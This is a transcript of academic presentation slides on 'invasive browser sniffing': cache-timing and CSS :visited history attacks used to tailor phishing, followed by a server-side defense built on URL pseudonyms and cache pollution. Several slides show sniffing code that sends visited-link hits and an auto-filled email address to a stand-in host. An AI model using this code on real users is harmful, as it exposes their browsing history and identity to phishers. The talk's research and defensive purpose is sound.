1 / 39

Invasive Browser Sniffing and Countermeasures

Invasive Browser Sniffing and Countermeasures. Markus Jakobsson & Sid Stamm. Context Aware Attacks. Data about targets obtained Used to customize emails Yields higher vulnerability rate. Context: Social Networks. Mine site for relationships (Alice knows Bob)

barr
Download Presentation

Invasive Browser Sniffing and Countermeasures

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm

  2. Context Aware Attacks Data about targets obtained Used to customize emails Yields higher vulnerability rate

  3. Context: Social Networks • Mine site for relationships(Alice knows Bob) • Spoof email from victim’s friend • People trust their friends (and that which spoofs them)

  4. Context: Browser-Recon • Phisher mines browsers • Browsing history • Cached data • Attacker can discover affiliations • Easy to pair browser history with email address

  5. GET /index.html GET /pics/pic1.jpg GET /pics/pic2.jpg Context: Cache Recon Pic1.jpg is Not in Cache … (pic1.jpg is not cached)

  6. GET /index.html Context: Cache Recon Pic1.jpg IS in Cache … (pic1.jpg is cached)

  7. GET pic1.jpg GET logout.jpg GET pic2.jpg Context: Cache Recon (Felten & Schneider, “Timing Attacks on Web Privacy”7th ACM Conference in Computer & Communication Security, 2000.)

  8. Context: History Recon What You See: The Code: <style> a { color: blue; } #id1:visited { color: red; } #id2:visited { color: red; } #id3:visited { color: red; } </style> <a id=id1 href=“x.com”>Link 1</a> <a id=id2 href=“y.com”>Link 2</a> <a id=id3 href=“z.com”>Link 3</a> Link 1 Link 2 Link 3

  9. Context: History Recon What You See: The Code: <style> a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); } … </style> <a id=id1 href=“x.com”>Link 1</a> <a id=id2 href=“y.com”>Link 2</a> <a id=id3 href=“z.com”>Link 3</a> Link 1 Link 2 Link 3

  10. Context: History Recon What You See: The Code: <style> a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); } … </style> <a id=id1 href=“x.com”></a> <a id=id2 href=“y.com”></a> <a id=id3 href=“z.com”></a>

  11. GET /?IAM=alice@x.com (lots of links) GET /hit?id=1&IAM=alice@x.com GET /hit?id=42&IAM=alice@x.com Phisher can nowassociate Alice withlink 1 and 42 History Recon + Email Auto-Fill Identity Extraction

  12. “Chameleon” Attack

  13. Solutions to Browser-recon • Client-Side Solutions: • Jackson, Bortz, Boneh Mitchell, “Protecting browser state from web privacy attacks”, To appear in WWW06, 2006. • CSS limiting • “User-Paranoia” (regularly clear history, cache, keep no bookmarks) • Server-Side Solution: • Make URLs impossible to guess

  14. Solution Goals Requirements • Hard to guess any pages or resources served by SP • Search engines can still index and search SP

  15. Formal Goal Specification

  16. Formal Goal Specification

  17. Solution Techniques • Two techniques: • Customize URLs with pseudonymshttp://chase.com/page.html?39fc938f • Pollute Client State (fill cache/history with related sites not visited by client) • Hiding vs. obfuscating • Internal (protected) URLs hidden • Entry point (public) URLs obfuscated

  18. S Solution to Browser-recon GET / C

  19. T ST SB Solution to Browser-recon GET /?13fc021b GET / C Domain of S

  20. Pseudonyms • Establishing a pseudonym • Using a pseudonym • Pseudonym validity check • Via Cookies • Via HTTP-REFERER • Via Message Authentication Codes

  21. Pseudonyms • Robot Policies • Dealing with search engines • Robots.txt “standard” (no problem if cheating) • Pollution Policy • Pollute entrance URLs • How to choose pollutants? • What about links to offsite data? • Bookmarks?

  22. GET /page.html?83fa029 GET /page.html Example Bank.com 10.0.0.1 C

  23. Example <a href=‘http://www.g.com’>Go to G</a> <a href=‘http://10.0.0.1/login.jsp’>Log in</a> <img src=‘/img/hi.gif’> hm Bank.com 10.0.0.1 C

  24. Example <a href=‘http://www.g.com’>Go to G</a> <a href=‘http://Bank.com/login.jsp’>Log in</a> <img src=‘/img/hi.gif’> hm Bank.com 10.0.0.1 C

  25. Example <a href=‘http://Bank.com/redir?www.g.com’>Go to G</a> <a href=‘http://Bank.com/login.jsp’>Log in</a> <img src=‘/img/hi.gif’> hm Bank.com 10.0.0.1 C

  26. Example <a href=‘http://Bank.com/redir?www.g.com?83fa029’>Go to G</a> <a href=‘http://Bank.com/login.jsp?83fa029’>Log in</a> <img src=‘/img/hi.gif?83fa029’> hm Bank.com 10.0.0.1 C

  27. Example <a href=‘http://Bank.com/redir?www.g.com?83fa029’>Go to G</a> <a href=‘http://Bank.com/login.jsp?83fa029’>Log in</a> <img src=‘/img/hi.gif?83fa029’> T Bank.com 10.0.0.1 C

  28. Client’s Perception

  29. Policies • Offsite Redirection Policy • Data Replacement Policy • Client vs. Robot Distinction

  30. Special Cases Shared/Transfer Pseudonyms Cache pollution reciprocity

  31. SB ST Prototype Details • Java App simulating an HTTP server • Pseudonyms: 64-bit random number • java.security.SecureRandom • Experimental Client: • Shell script + CURL

  32. Experimental Results

  33. Experimental Results

  34. Experimental Results

  35. Experimental Results

  36. General Considerations • Forwarding user-agent • Translate Cookies • Optimizations

  37. ? Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm

More Related